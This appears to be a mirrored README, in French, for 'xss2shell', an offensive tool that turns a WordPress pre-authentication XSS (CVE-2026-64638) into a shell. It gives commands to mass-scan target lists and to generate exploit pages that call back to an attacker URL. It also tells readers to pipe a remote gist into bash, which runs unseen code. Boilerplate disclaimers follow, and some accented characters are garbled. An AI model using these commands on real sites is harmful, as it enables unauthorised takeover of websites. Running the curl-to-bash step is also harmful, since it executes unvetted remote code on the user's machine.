## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2026-64638
# CVE-2026-64638
## Faire un don
Soutenez la maintenance de ce projet via PayPal ou en scannant le code QR ci-dessous.


## ⚡ Utilisation simple
Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :
* Machines virtuelles locales
* Conteneurs Docker
* Configurations de laboratoire isolées
* Environnements de test d'intrusion autorisés
Exemple de configuration :
root@kitploit:~
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Exemple d'utilisation :
root@kitploit:~
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
Remarque :
* Si vous clonez depuis un autre projet, vous devez exécuter `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y` pour supprimer le dossier .git imbriqué
* par ex. : cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
* * *
## Crédit ou référence
* https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
* https://pwn.ai/blog/xss2shell
* * *
# 📚 Dépôt de recherche pédagogique en sécurité
Un dépôt pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.
* * *
## ⚠️ Avertissement de sécurité et mention légale
## Objectif
Ce dépôt est destiné **uniquement à la recherche en sécurité pédagogique et autorisée**.
Il est conçu pour aider les utilisateurs à découvrir :
* Vulnérabilités de sécurité
* Concepts de bac Ă sable (sandbox) et d'isolation
* Pratiques de codage sécurisé et de défense
* * *
## Utilisation autorisée uniquement
Utilisez ce dépôt uniquement dans des environnements où vous avez l'autorisation, comme :
* Laboratoires personnels ou machines virtuelles
* Environnements Docker ou isolés
* Tests d'intrusion autorisés
* Formation en cybersécurité ou recherche académique
Toute utilisation non autorisée ou illégale est strictement interdite.
* * *
## Aucune responsabilité
L'auteur et les contributeurs **ne sont pas responsables** des dommages, utilisations abusives, problèmes juridiques ou pertes causés par ce projet.
En utilisant ce dépôt, vous acceptez que :
* Vous ĂŞtes responsable de vos propres actions
* Vous l'utiliserez légalement et de manière éthique
* Le projet est fourni **sans garantie**
* * *
## Utilisation éthique
Ce projet est conçu pour :
* Recherche en sécurité défensive
* Éducation à la cybersécurité
* Sensibilisation aux vulnérabilités
* Recherche sur les systèmes et logiciels sécurisés
Veuillez suivre les pratiques de divulgation responsable et vous conformer Ă toutes les lois applicables.
* * *
## Contact
Pour une divulgation responsable ou une collaboration, contactez le mainteneur du dépôt via GitHub.